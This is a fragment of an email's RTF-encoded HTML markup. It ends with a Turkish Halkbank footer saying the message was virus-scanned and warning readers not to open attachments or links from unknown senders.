\trcbpat2\trftsWidth2\trwWidth5000\clcbpat8\cellx8856\pard\intbl\cbpat8\plain\f0{\cf3\htmlrtf0   {\*\htmltag0 </TD>}\htmlrtf
}\htmlrtf0{\*\htmltag0 }\htmlrtf\cell\htmlrtf0{\*\htmltag0 </TR>}\htmlrtf\pard\intbl\row
\htmlrtf0{\*\htmltag0 </Tbody></Table>}{\*\htmltag0 <br>}\htmlrtf\pard\cbpat2\plain\f0{\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 <pre>}\htmlrtf}\htmlrtf0{\*\htmltag0 <font color="blue">}\htmlrtf\par
\htmlrtf0\pard\cbpat2\sb280\plain\htmlrtf{\f3\cf10\line
\htmlrtf0{\*\htmltag0\par}***** Bu e-posta zararl\'FD i\'E7eri\'F0e kar\'FE\'FD, HALKBANK Antivirus ve e-posta Tarama Sistemleri taraf\'FDndan taranm\'FD\'FEt\'FDr. L\'FCtfen tan\'FDmad\'FD\'F0\'FDn\'FDz kullan\'FDc\'FDlardan gelen ek ve link'leri a\'E7may\'FDn\'FDz. *****\htmlrtf
\line
\htmlrtf0{\*\htmltag0\par}\htmlrtf\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 </Font>}\htmlrtf}\htmlrtf0{\*\htmltag0 </Pre>}\htmlrtf\par
\htmlrtf0{\*\htmltag0 <br>}\htmlrtf\pard\cbpat2\sb280\plain\f0{\line
\htmlrtf0{\*\htmltag0\par}{\*\htmltag0 </Body>}\htmlrtf}\htmlrtf0{\*\htmltag0 </Html>}}
 \ec-Ÿ˜